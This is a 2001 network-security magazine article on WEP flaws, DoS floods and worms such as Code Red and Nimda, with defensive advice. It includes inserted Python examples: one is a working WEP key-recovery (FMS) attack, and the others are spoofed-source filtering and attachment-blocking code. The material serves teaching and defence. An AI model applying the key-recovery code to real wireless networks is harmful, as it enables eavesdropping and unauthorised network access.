24th December 2001

Swatting persistent security pests

DoS attacks, worms, and wireless vulnerabilities constantly hover at the edges of networks. In this article, Andrew Conry-Murray explores the origin of these attacks, discusses the reasons they are so prevalent, and highlights steps administrators can take to avoid getting stung

One night last summer, a mosquito awakened me. I couldn’t see it in the dark, but its dentist-drill whine was unmistakable. As it passed my right ear I slapped wildly, hoping for a kill. Then I waited a minute. Silence. I relaxed. Suddenly the buzzing began at my left ear. Again I flailed at myself. Again a quiet interlude, then another attack.

Finally I turned on the light. The mosquito hovered in a high corner of my bedroom, bobbing like a prizefighter. I grabbed a t-shirt and lashed out. The mosquito’s evening ended with a satisfying thwack and a telltale smear on the wall. I settled back in bed, pleased that I’d taken action. Had I just lain there, the bug would’ve come at me all night until it got what it wanted: my blood.

Bloodsuckers swarm the Internet too, and three in particular bite networkers again and again: wireless vulnerabilities, Denial of Service (DoS) attacks, and worms. These threats persist for several reasons, including an abundance of automated attack tools, egregious technology failures, and sometimes sloppy security administration.

Wireless woes

Wireless LANs based on the 802.11b standard (2.4GHz operation with speeds of 11Mbits/sec) have been making inroads to corporate networks for three reasons: they’re cheaper to install than cabling, they’re easy to set up, and they let workers stay connected to the network as they roam from office to conference room and even outdoors. According to a Gartner survey, 50 percent of respondents will have a wireless access point touching their corporate networks by the end of 2001.

However, thanks to poor security design, a wireless network can let attackers waltz right into a corporate network. Wireless’ primary vulnerability (it’s a radio transmitter broadcasting traffic hundreds of feet in every direction, well past the walls of the building) is well known. Stories abound of security researchers armed with wireless-enabled laptops intercepting corporate traffic as they sit in a company’s parking lot or lobby.

Wired Equivalent Privacy (WEP), part of the IEEE’s 802.11 standard, was supposed to neutralise wireless’ gregariousness by adding encryption and access control. But recent developments demonstrate that WEP is about as strong as a wet paper bag.

“WEP is insecure in just about every way you could be afraid of,” says Dave Wagner, cryptography expert and assistant professor of computer science at the University of California, Berkeley. He and colleagues Nikita Borisov and Ian Goldberg were one of several groups that discovered exploitable holes in both the 40-bit and 128-bit versions of WEP. “You can eavesdrop on WEP sessions, you can tamper with transmitted packets, you can bypass the access control to gain access to the network,” he says.

The most troubling attack was posited in a paper by researchers Fluhrer, Mantin, and Shamir, who described a way to recover the shared secret key that WEP uses to encrypt traffic between the access point and a client. The paper was merely theoretical until three AT&T Labs researchers tried the attack against a real network and recovered its key. The problem lies in the way WEP uses RC4, the underlying cipher. WEP encrypts each frame under the secret key with a 24-bit initialisation vector (IV) prepended, and sends the IV in the clear; for certain ‘weak’ IVs the first byte of RC4 output leaks information about the key byte that follows the IV, and because every frame begins with a known header byte, that first keystream byte is always available to an eavesdropper. “They started with a good encryption algorithm and misapplied it,” says Wagner.

As is usually the case, this high-level research has condensed itself into easily-used attack tools such as AirSnort and WEPCrack, which let even low-skilled attackers decipher WEP-encrypted data.

Using AirSnort, “an attacker can break the cryptography by listening to about 15 minutes of network transmissions,” says Wagner. “Someone sitting in a van in your parking lot could use the attack to eavesdrop on your traffic. Once this attack is finished, the bad guy learns your encryption keys.”
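To show what ‘misapplied’ means concretely, here is an added example (not code from the article, AirSnort or WEPCrack): a self-contained Python simulation of the Fluhrer-Mantin-Shamir attack. The ‘victim’ encrypts frames under RC4(IV || secret) exactly as WEP does; the ‘attacker’ sees only each frame’s 3-byte IV and first ciphertext byte. The 40-bit key, the set of IVs and the frames are all constructed here; 0xAA as the known first plaintext byte is WEP’s LLC/SNAP header; and the top-4 candidate search with a 16-frame verification step is an addition modelled on what cracking tools do, not something taken from the paper.

```python
from collections import Counter

# Every WEP data frame starts with an LLC/SNAP header whose first byte is 0xAA, so an
# eavesdropper always knows the first keystream byte: z = first_ciphertext_byte ^ 0xAA.
SNAP_HEADER = 0xAA


def ksa(key):
    """RC4 key scheduling: derive the 256-entry permutation S from the key bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S


def first_keystream_byte(key):
    """The first byte RC4 emits for `key` (one PRGA step), which is all this attack uses."""
    S = ksa(key)
    i, j = 1, S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) % 256]


def wep_frames(secret, ivs):
    """Victim side.  WEP seeds RC4 with IV || secret for every frame and sends the 3-byte IV in
    the clear; the attacker captures (iv, first ciphertext byte) pairs and nothing else."""
    return [(iv, first_keystream_byte(bytes(iv) + secret) ^ SNAP_HEADER) for iv in ivs]


def weak_ivs(key_len):
    """IVs of the form (A+3, 255, X) are the classic FMS 'resolved' IVs for secret byte A.
    A card that steps through IVs sequentially emits them sooner or later: the IV space is
    only 24 bits.  Constructed here so the simulation needs no waiting."""
    return [(A + 3, 255, x) for A in range(key_len) for x in range(256)]


def fms_vote(iv, known, c0):
    """Attacker side.  Replay the first A+3 KSA steps, whose key bytes (IV + recovered prefix)
    are known.  For a resolved IV the first keystream byte equals, about 5% of the time, the
    value KSA step A+3 swaps into S[A+3], and that step's j reveals K[A+3].  Returns a
    candidate key byte, or None when the IV is not resolved and carries no information."""
    A = len(known)
    K = list(iv) + list(known)
    S, j = list(range(256)), 0
    for i in range(A + 3):
        j = (j + S[i] + K[i]) % 256
        S[i], S[j] = S[j], S[i]
    if S[1] >= A + 3 or (S[1] + S[S[1]]) % 256 != A + 3:
        return None
    z = c0 ^ SNAP_HEADER
    return (S.index(z) - j - S[A + 3]) % 256


def recover_key(frames, key_len, width=4, known=()):
    """Vote for each key byte in turn.  Because a vote is only ~5% reliable per frame, search
    the top `width` candidates depth-first and accept a key only when it reproduces the first
    ciphertext byte of the first 16 captured frames (the kind of check cracking tools use)."""
    A = len(known)
    if A == key_len:
        key = bytes(known)
        check = frames[:16]
        if all(first_keystream_byte(bytes(iv) + key) ^ SNAP_HEADER == c0 for iv, c0 in check):
            return key
        return None
    votes = Counter()
    for iv, c0 in frames:
        if iv[0] == A + 3:  # only IVs aimed at this key byte carry a vote
            cand = fms_vote(iv, known, c0)
            if cand is not None:
                votes[cand] += 1
    for cand, _ in votes.most_common(width):
        key = recover_key(frames, key_len, width, known + (cand,))
        if key is not None:
            return key
    return None


if __name__ == "__main__":
    SECRET = bytes.fromhex("3a7f1c5d90")  # constructed 40-bit key; the attacker never sees it
    captured = wep_frames(SECRET, weak_ivs(len(SECRET)))
    print("recovered key:", recover_key(captured, len(SECRET)).hex())  # prints 3a7f1c5d90
```

Run as a script it prints the recovered key. The voting needs only the 256 weak IVs per key byte built here; a real capture has to wait for the card to emit them, which is where Wagner’s ‘about 15 minutes’ comes from, and a 104-bit key simply takes eight more rounds of the same loop. Nothing about the secret key’s length or quality helps: the leak is in how the IV is bolted onto the key.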

Besides deciphering data, possession of the key gives an attacker access to the wireless network, which may expose systems on the wired network, such as workstations, production servers, databases, and other rich pickings.

But before you start yanking NICs out of laptops, experts say that wireless LANs can be safe, as long as you don’t rely on WEP. According to John Pescatore, research director for Internet security at the Gartner Group, major vendors of wireless products such as Cisco Systems and Agere (Orinoco) have added their own security measures. One measure is dynamic key management, in which the access point frequently changes the encryption key, so that an eavesdropper never collects enough traffic under one key to run the attack.

However, until the IEEE releases an updated standard, don’t expect the security features in products from different vendors to interoperate. Pescatore says that a new draft standard may appear in the first quarter of 2002, with compatible products on the market by the end of 2002.

What if you don’t want to be locked in to a single vendor but you also can’t wait until the end of 2002? There are other options, but they’ll cost you. You can purchase security solutions from smaller companies such as Colubris, Bluesocket, Proxim, and Funk Software, to add to your present wireless infrastructure. These solutions layer strong authentication and encryption over your wireless traffic.

Alternatively, you can treat your wireless network the same way you would the Internet. Ensure that wireless traffic entering your corporate network has to pass through a firewall first. Also, “wherever you have a wireless access point, put a VPN server behind it,” says Pescatore. “When I connect to the access point, I’m behind this VPN server that I have to authenticate to, just the way I would over the Internet.” An IPSec-compatible VPN provides much stronger authentication and encryption than WEP. However, it also requires installing additional VPN gateways and clients, as well as assuming the subsequent administrative costs.

Even if you tighten wireless security or your company won’t install a wireless LAN, don’t think you’ve dodged this bullet. “Wireless base stations are becoming so cheap, employees can go buy a hundred-dollar access point and plug it in to the corporate network without telling anyone,” says Wagner.

These ‘rogue’ access points blow a huge hole in your carefully constructed defences. Besides operating without administrative controls, the default configurations for most access points don’t even have WEP turned on. Pescatore recommends that administrators regularly sweep their buildings for unauthorised base stations. Hacker tools or commercial products such as Network Associates’ Sniffer Wireless can hunt down these rogue elements.

Denial ain’t a river in Egypt

DoS and Distributed DoS (DDoS) attacks are well understood. The perpetrator bombards a target with more traffic than it can handle. The bad traffic prevents legitimate users from accessing the resources under attack. DoS and DDoS work either by exhausting a target machine’s resources (CPU, memory, or the table of half-open connections that a SYN flood fills) with bogus requests, or by soaking up network bandwidth with spurious traffic. A single computer can launch a DoS attack, but most attacks use numerous machines, either in a co-ordinated effort by multiple users or by commandeering unwitting computers (often called zombie hosts).

So if DoS attacks are well understood, why are they still a problem? One reason is that the attacks themselves use legitimate network protocols such as TCP and UDP to carry out their mischief. Networks “have to let certain types of traffic through, so that’s the type [attackers] send,” says Stefan Savage, chief scientist at DoS prevention company Asta Networks, and assistant professor of computer science at University of California, San Diego.

Attackers “will send floods of TCP data that just has the ACK flag set. That will pass through almost every firewall around,” notes Savage. “It’s hard to disambiguate what is legitimate data and what isn’t.”

Other popular attacks use Internet Control Message Protocol (ICMP) messages, such as ICMP Time Exceeded and ICMP Echo Reply, to overwhelm computational resources. Savage says that these are valid control messages that must be allowed in a network to use common tools like Traceroute and Ping.

Another reason for DoS’s persistence is that many automated tools (such as Trinoo and Tribe Flood Network) make launching attacks child’s play. Lastly, attackers have access to considerable firepower, whether from a single PC with a broadband connection or a score of conscripted zombie hosts.

Joe Magee, chief security officer for TopLayer Networks, which makes load balancing and security devices, says a home broadband connection can easily pump out enough traffic to take down a server. “We set up an IIS 5 Web server with no SYN flood defences,” he says. On a Pentium 400 platform, the test machine handled between 100 and 120 SYN packets per second. “A 128Kbit upload connection, which is typical in most home DSL or cable modems, is capable of sending out 200 to 800 SYNs per second.” That’s enough packet power to knock out eight Web servers from one PC.

Of course, many attackers aren’t content to use a single machine. Myriad holes and vulnerabilities in operating systems allow attackers to break into machines and install remote control programs. The result is an army of devices ready to launch packets when and where the attacker instructs. The automation of the whole process compounds this problem. “There’s this notion that hackers are sitting around trying to break into all these machines,” says Savage. “The reality is different. They have scripts that scan millions of addresses on the Internet. They have a library of vulnerabilities they test all these machines for. Then you just go to sleep, and you wake up and you have 10,000 hosts.”

So just how bad is the problem? Savage, along with two colleagues at the University of California, San Diego, studied DoS attacks and determined the following: Over a three-week period in February 2001, they observed more than 12,000 attacks against more than 5,000 distinct hosts. Victims ranged from well-known commercial sites such as Amazon.com and AOL to ISPs, foreign sites, and home computers.

DoS attacks put enterprises in double jeopardy. They may be susceptible to service outages, or enterprise machines may be hijacked and used to launch attacks on other targets. Even if you think your business doesn’t have anything to tempt an intruder, any computers connected to the Internet represent resources that a miscreant may want to utilise.

In addition to business losses due to service outages, DoS causes collateral damage. “The most important item that we hear from customers is the protection of the brand,” says Rich Helgeson, CEO and president of Captus Networks, a DoS mitigation company. “They’ve spent a number of years developing the brand, getting a trusted environment with customers, and therefore they cannot afford anything that compromises the brand.”

What’s a networker to do? First and foremost, apply patches. This probably isn’t the first time you’ve heard this, and it certainly won’t be the last, because applying patches and hot fixes to your operating systems and applications is the surest way to keep your own machines from being conscripted as zombies and to close the bugs that let a single malformed packet crash a host. Patching won’t stop a raw flood of well-formed packets, though; for that you need filtering and rate limiting, described below.

Aside from patching, ingress and egress filtering can curb some DoS attacks. Many DoS tools spoof the source address of packets to hide the location of the computer launching the attack. Using ingress and egress filtering, routers can be configured to drop packets with spoofed addresses so that the nefarious traffic never reaches its target.

Service providers perform ingress filtering. According to RFC 2827, “Network Ingress Filtering,” ISPs that aggregate routing announcements for numerous downstream networks can block any traffic that has a source address outside legitimately advertised prefixes. ISPs aren’t mandated to perform ingress filtering, and in fact the provider’s size might make it impossible. However, it can’t hurt to check with your provider to see what it can do for you.

Egress filtering takes place at enterprise border routers. A router configured for egress filtering will drop packets with a source address not legally assigned to your network. This is one way to prevent yourself from being an unwitting participant in a DoS attack. If an attacker has planted zombie hosts inside your network, egress filtering may prevent those packets from getting out your front door.

Of course, ingress and egress filtering won’t stop packets that carry legitimate source addresses (a zombie inside your network sending under its own address sails straight through), but at least the source address then points at the offending machine, so you can track it down.
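Here is an added example (not from the article or from RFC 2827) of both filters as code, so you can see exactly which packets each one stops and which it cannot: a provider-side per-interface ingress table, an enterprise egress rule, and a constructed packet log run through them. All prefixes (documentation ranges), interface names, customer names and log lines are made up for the example.

```python
import ipaddress
from collections import Counter


def prefixes(*cidrs):
    return [ipaddress.ip_network(c) for c in cidrs]


# Provider edge (constructed): the source prefixes that may legitimately arrive on each
# customer-facing interface.  This is the per-interface list RFC 2827 asks providers to keep.
PROVIDER_INGRESS = {
    "ge-0/0/1": prefixes("198.51.100.0/24"),                     # customer Acme, single-homed
    "ge-0/0/2": prefixes("203.0.113.0/25", "203.0.113.128/26"),  # customer Bolt, two blocks
}

# Enterprise border (constructed): Acme's own address block, the only sources allowed out.
ACME_PREFIXES = prefixes("198.51.100.0/24")


def in_prefixes(addr, nets):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in nets)


def egress_ok(src):
    """Acme's border router: a packet may leave only with a source address Acme owns."""
    return in_prefixes(src, ACME_PREFIXES)


def ingress_ok(iface, src):
    """Provider's RFC 2827 rule: a packet arriving on a customer interface must carry a source
    inside that customer's advertised prefixes.  An unknown interface gets no allowance at all."""
    return in_prefixes(src, PROVIDER_INGRESS.get(iface, []))


def apply_filters(log_lines):
    """Run a constructed packet log ('<iface> <src> <dst> <proto> <flags>') through both filters
    in the order a packet meets them: Acme's egress rule first on Acme's link, then the
    provider's ingress rule.  Returns (forwarded_lines, [(line, rule_that_fired), ...])."""
    forwarded, dropped = [], []
    for line in log_lines:
        iface, src, dst, proto, flags = line.split()
        if iface == "ge-0/0/1" and not egress_ok(src):
            dropped.append((line, "egress: source not in Acme's 198.51.100.0/24"))
        elif not ingress_ok(iface, src):
            dropped.append((line, f"ingress: source not allowed on {iface}"))
        else:
            forwarded.append(line)
    return forwarded, dropped


def top_sources(forwarded, n=3):
    """What the filters cannot do: a zombie that sends under its real address is forwarded.
    The forwarded traffic, counted per source, is the trail back to that machine."""
    return Counter(line.split()[1] for line in forwarded).most_common(n)


SAMPLE_LOG = [  # constructed; 192.0.2.10 is the victim
    "ge-0/0/1 198.51.100.7 192.0.2.10 tcp SYN",          # ordinary client: forwarded
    "ge-0/0/1 10.0.0.5 192.0.2.10 tcp SYN",              # spoofed private source: egress drop
    "ge-0/0/1 192.0.2.200 192.0.2.10 tcp ACK",           # spoofed foreign source: egress drop
    "ge-0/0/1 198.51.100.42 192.0.2.10 tcp ACK",         # zombie flooding under its own address:
    "ge-0/0/1 198.51.100.42 192.0.2.10 tcp ACK",         #   forwarded, but visible to top_sources()
    "ge-0/0/1 198.51.100.42 192.0.2.10 tcp ACK",
    "ge-0/0/2 203.0.113.9 192.0.2.10 icmp echo-reply",   # Bolt host, legitimate source: forwarded
    "ge-0/0/2 198.51.100.9 192.0.2.10 icmp echo-reply",  # Acme address on Bolt's link: ingress drop
    "ge-0/0/2 203.0.113.200 192.0.2.10 udp -",           # .192/26 is not Bolt's: ingress drop
]

if __name__ == "__main__":
    forwarded, dropped = apply_filters(SAMPLE_LOG)
    for line, rule in dropped:
        print("DROP", line, "<-", rule)
    print("busiest forwarded sources:", top_sources(forwarded))  # 198.51.100.42 leads with 3
```

The last log line is the case worth noticing: 203.0.113.200 looks like a Bolt address, but Bolt only advertises .0/25 and .128/26, so the provider’s per-interface list, not a guess at the customer’s ‘range’, is what decides. The ACK packets from 198.51.100.42 are the other lesson: nothing in either filter can reject them, which is exactly why Savage calls ACK floods hard to disambiguate, and the per-source count is what you hand to the desktop team.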

Firewalls and Intrusion Detection Systems (IDSs) generally include a smattering of DoS prevention capabilities against common attacks such as SYN floods. However, a crop of new specialised devices promise full-blown protection. Vendors such as Captus Networks, Asta Networks, Arbor Networks, Top Layer Networks, and others are selling in-line hardware devices that scan incoming traffic for anomalous behaviour. Traffic that fits DoS profiles can be filtered, blocked, re-routed, or rate-limited. Several vendors claim that their devices can respond to DoS attacks within 60 seconds.

It’s difficult to predict how the marketplace will greet this specialised anti-DoS gear. Administrators may be wary of installing yet another security box in the data stream with all its attendant costs: learning to operate the product, dealing with yet another management interface, and responding to more alerts. It’s also possible that if you wait long enough, the algorithms that power these DoS solutions may find their way into a multipurpose security device.

On the other hand, such devices have several compelling claims. First, they can tell you if something’s actually wrong. Are you actually under attack or just experiencing a spike in legitimate traffic? Second, these products can provide concise information about an attack, which allows for granular responses so that normal traffic still gets through. Finally, having automated responses prepared in advance can save precious time, especially in the first frantic minutes of a raging packet flood.

Worms crawl in, worms crawl out

In 2001, worms began to displace viruses in the media spotlight. How does a worm differ from a virus? “The way I think of a virus is something that replicates by infecting multiple files on the one host, whereas worms tend to just infect hosts once, and then they use network calls to move on and infect the next host,” says Roger Thompson, technical director of malicious code research for TruSecure. Typically, worms spread via e-mail or by scanning for machines with known vulnerabilities that the worm exploits to burrow in.

Worms usually don’t require any human interaction to spread. “Case in point is the Code Red worm,” says Sharon Ruckman, senior director at Symantec Security Response. “If your machine had the vulnerability that it was looking for, you could be home asleep, and once you had been infected, it was going off trying to infect other people and you had no idea.”

Ruckman says that this automation is one reason worms are becoming more prevalent. “If you look at AnnaKournikova or LoveLetter, you had to open it up and click on the attachment for it to attack. With the worm technology, once you can get it in there, you don’t need any humans to continue the propagation.” Ruckman also notes that worms have plagued us since the late 1980s, but increased connectivity makes it easier for worms to spread.

Experts say that Code Red and Nimda display more sophisticated programming than other prominent viruses. This may mean fewer copycat versions floating around the Internet in the coming weeks and months. “The script viruses that were the problem up until this year were written in Visual Basic, so it was very easy for script kiddies to make minor changes to those things,” says Thompson. “With Nimda and Code Red the source code isn’t available. They’re written in either assembler or C, something that’s a bit beyond most people. It’ll be the authors that make the changes.”

Of course, more sophisticated programming also means more trouble. One of the reasons Code Red and Nimda attracted so much attention is because they were “an integrated or blended security threat,” says Ruckman. That is, worm writers are combining multiple attacks in a single package. For example, besides exploiting a buffer overflow in the Index Server ISAPI extension (idq.dll) of Microsoft’s IIS 4.0 and 5.0 servers, Code Red attempted a DoS attack against the White House’s Web site. Code Red II installed a Trojan Horse (a back door) on every system it infected that opened the machine to remote control.

Nimda is a more pernicious blended threat because it attacked systems in four different ways. Like Code Red it exploited a hole in IIS servers, but it also spread itself via e-mail attachments, by infecting shared drives on Windows machines, and by planting itself in a Web page and attempting to download itself to any computer that visited that page. Nimda could also give an attacker administrative privileges on compromised servers.

The bad news is that Ruckman and Thompson say that these multi-threat worms are the wave of the future, especially as more vulnerabilities are discovered. “When we see another good buffer overflow, I expect we’ll see another version of Code Red,” says Thompson. “That allows them to march into a machine that people otherwise think it is protected.”

The good news is that administrators can stomp out these worms simply by installing the appropriate patches. “Neither Code Red nor Nimda would’ve got in if people had been patched,” says Thompson. In fact, Microsoft released fixes for the IIS vulnerabilities weeks before the worms reared their heads. Microsoft also recently released a set of free tools to help administrators keep abreast of patches and hotfixes, most notably one called HFNetChk, which compares the hotfixes installed on a machine against Microsoft’s list of available ones.

Administrators can also protect themselves by maintaining anti-virus updates, filtering potentially dangerous attachments such as .exe at e-mail gateways, and having a recovery plan in place if a worm or virus should corrupt computers and data.
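As an added example (not from the article) of the gateway filtering recommended above, here is a Python check run over a constructed MIME message. The blocklist, the addresses and the message bodies are made up; the attachment names AnnaKournikova.jpg.vbs and LOVE-LETTER-FOR-YOU.TXT.vbs are the ones those two worms really used, readme.exe is Nimda’s, and wrapping it inside a forwarded message (readme.eml) is a constructed case for the nested-message check.

```python
from email.message import EmailMessage

# Constructed gateway policy: extensions Windows will execute on a double-click.
BLOCKED_EXTENSIONS = {"exe", "com", "scr", "pif", "bat", "vbs", "js", "jse", "wsf"}


def risky_extensions(filename):
    """All extension components after the first dot, lower-cased and stripped of padding, so
    'AnnaKournikova.jpg.vbs' -> ['jpg', 'vbs'] and 'notes.txt      .exe' -> ['txt', 'exe'].
    Looking only at what appears to be 'the' extension is how double-extension names get
    through; checking every component is what catches them."""
    return [p.strip() for p in filename.strip().lower().split(".")[1:]]


def flag_attachments(msg):
    """Return (filename, blocked_extension_or_None) for every named part.  msg.walk() descends
    into message/rfc822 parts, so a worm attached inside a forwarded .eml is inspected too."""
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        name = part.get_filename()  # honours both the Content-Disposition and Content-Type names
        if not name:
            continue
        hit = next((e for e in risky_extensions(name) if e in BLOCKED_EXTENSIONS), None)
        findings.append((name, hit))
    return findings


def gateway_verdict(msg):
    """'quarantine' if any attachment carries a blocked extension, otherwise 'deliver'."""
    return "quarantine" if any(hit for _, hit in flag_attachments(msg)) else "deliver"


def build_message(attachments, forwarded=None):
    """Construct a test message from (filename, bytes) attachments; `forwarded`, if given, is a
    second list of attachments built into an inner message and attached as readme.eml."""
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = "alice@example.com", "bob@example.com", "see attached"
    msg.set_content("Files attached.")
    for name, data in attachments:
        msg.add_attachment(data, maintype="application", subtype="octet-stream", filename=name)
    if forwarded:
        msg.add_attachment(build_message(forwarded), filename="readme.eml")
    return msg


if __name__ == "__main__":
    sample = build_message([("AnnaKournikova.jpg.vbs", b"..."), ("report.pdf", b"%PDF")],
                           forwarded=[("readme.exe", b"MZ")])
    for name, hit in flag_attachments(sample):
        print(f"{name:26s} {'BLOCK .' + hit if hit else 'ok'}")
    print(gateway_verdict(sample))  # prints quarantine
```

The policy here is deliberately an extension blocklist, which is what 2001-era gateways could do; it says nothing about a .doc with a macro or a renamed executable, so it sits alongside anti-virus updates rather than replacing them, and the parts of the message it quarantines should be kept for the recovery plan rather than silently discarded.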

Bug spray

If these problems teach us anything, it’s that administrators must be vigilant and proactive. Rather than lie in the dark and wait to get bit, act now to swat the critters that may be lurking at the perimeter of your network. The steps you take today could keep a simple bug bite from escalating into a deadly infection.

www.networkmagazine.com

© Copyright 2000: Indian Express Group (Mumbai, India). All rights reserved throughout the world. This entire site is compiled in
Mumbai by The Business Publications Division of the Indian Express Group of Newspapers.